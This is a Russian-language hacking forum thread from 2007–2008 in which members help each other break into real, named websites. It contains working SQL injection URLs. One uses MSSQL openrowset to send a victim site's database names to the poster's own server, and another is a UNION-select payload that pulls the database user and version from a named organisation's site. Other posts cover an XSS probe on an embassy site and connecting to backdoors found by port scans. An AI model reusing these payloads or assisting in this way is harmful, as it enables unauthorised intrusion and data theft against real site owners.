Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    ну собственно не как :)купи проше деда да втыкай что душе угодно :)
     
    1 person likes this.
  2. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?
     
    1 person likes this.
  3. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    может осталась от чего-то. или просто бд тестили. или фейк. или для другого домена. есть много вариантов
     
  4. cyberia

    cyberia New Member

    Joined:
    29 Mar 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    mssql-inject: приём данных на мой сервер

    Пробую сделать передачу данных через инжект на свой mssql-сервер. Но возникла проблема с моим принимающим сервером.

    Купил windows-хостинг с выделенным ипом. Создал базу данных MSSQL 2005 с именем basename. Пользователь username с паролем password. Создал таблицу tbltest с колонкой pubs.

    Посылаю запрос: http://www.top25cigar.com/reviewdatabase/product.asp?pkID=8797&showprod=yes&catpkID=315;insert+into+openrowset('sqloledb','uid=username;pwd=password;network=DBMSSOCN;Address=208.115.103.4','select+line+from+pubs..tbltest')+select+name+from+master..sysdatabases;--

    В ответ получаю Cannot open user default database. Login failed. Хотя по умолчанию база данных установлена. Мне кажется, что ошибка где-то в правах доступа.

    Что мне исправить? Ниже приложу несколько скриншотов из MSSQL Server Management Studio Express.

    [​IMG]
    [​IMG]
     
    #1504 cyberia, 2 Apr 2008
    Last edited: 2 Apr 2008
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    cyberia
    1 акк корректен
    2 твоя таблица создана и идентична по структуре
    3 запрос без грамматических ошибок
    4 есть права на чтение master..sysdatabases
    Эти условия выполнены?
    Помоеиу невыполнение ЛЮБОГО из условий не даст тебе ничего сделать.
    Да , забыл, порт на котором твой сервер висит.
    Имхо слишком много заморочек, но дело твоё конечно, проверь ВСЕ условия
     
    1 person likes this.
  6. Hell0

    Hell0 New Member

    Joined:
    30 Mar 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Подскажите, что можно зделать есть маленький доступ

    http://fialki.ho.com.ua/products_pictures/
    вот от создателей
    http://www.shop-script.ru/images/
    или это не чего не дает
     
  7. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    2Hell0
    Это дает только просмотр файлов и каталогов в данных директориях
     
  8. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Здравствуйте, разесните мне пожалуйста один момент, при сканировании портов утилитой Shadow Security Scanner 7, она показывает что на сервере открыто огромное количество портов, среди них очень много бекдоров, нахожу клиен к бекдору, но не один не коннектится, пробовал на разных сайтах, где открыты эти порты, ни чего не получилось.
    XSpyder'ом пробывал сканить, тот вообще не работает, ни трафу не жрет, ни порты не сканирует, только нагрузку на проц создает. Помогите пожалуйста дельным советом.
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Spaise
    В чём вопрос то?
    XSpyder не работает? Или открытые порты смущают?Огромное кол-во это сколько, и главное какие?С чего ты взял ,что "среди них очень много бекдоров", что за клиент к бекдору? :D
     
    1 person likes this.
  10. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    товарисчи напомните как вывести имя бд, для опр. таблицы, schema_name помню, а откуд забыл
     
  11. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    SELECT table_schema FROM information_schema.tables WHERE table_name='imyatablici'
     
  12. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    Code:
    http://www.wfsj.org/projects/page.php?id=-62+union+select+null,null,null,null,null,null,null,null,null,null,null/*
    
    такя проблема есть скуль возникла такая проблема с выводом заначений когда вставляю подставляю int значения
    Code:
    http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11/*
    
    все норм но если подставляю Что нить типа user или from table возникает ошибка в чем проблема :)
     
  13. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Пробуй так
    Code:
    http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),4,5,6,7,8,9,10,11/*
    
    вер. 4.1.7-nt-max
    юзер. wfsj@localhost
    Прочитать можно тут
    http://forum.antichat.ru/showthread.php?t=19605

    Да и еще, убери пробелы которые добавил форум.
    Удачи.
     
    #1513 Red_Red1, 4 Apr 2008
    Last edited: 4 Apr 2008
    1 person likes this.
  14. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
  15. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    вобщем тема такая- защел я на наше посольство зарубежом(по понятным причинам умолчу в которое) и в поиске ввел "><script>alert()</script>
    на что мне выдало

    [​IMG]
    вот и возникает у меня вопросс- действительно это скуль? и насколько это опасно в плане IT безопасности (за Родину обидно млин) , мож предупредить их ?
     
    3 people like this.
  16. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    я таки думаю что кроме раскрытия путей больше не как и не используешь по крайней мере по скрину :)
    ну это раскрытие может быть полезно если будет скуль с filepriv :)
     
    #1516 MaSter GeN, 4 Apr 2008
    Last edited: 4 Apr 2008
    1 person likes this.
  17. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    типичная ошибка servlet'a имхо...
     
    1 person likes this.
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    zapadlo17
    Помоему ошибка при проверке ввода, просто некоректные данные
    Всмысле, возможность инжекта из этого не вытекает
     
    #1518 Kakoytoxaker, 4 Apr 2008
    Last edited: 4 Apr 2008
    1 person likes this.
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Ошибка говорит о том, что на MSSQL сервере (скорее всего) отключена поодержка full text search, не знаю почему возникает такая ошибка, но скорее всего из-за того, что в запросе встречаются спецсимволы, которые в полнотекстовом поиске используются в качестве шаблонов
     
    1 person likes this.
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Я не наю, куда ещё писать, но раз это вопросы,то вот пара нупских вопросов :
    1. Надо ли указывать настоящий логин для перебора хеша?))
    2. Если да, то как в таком случае используется логин(или имя,как хотите : ) ) для перебора ?)
     
Thread Status:
Not open for further replies.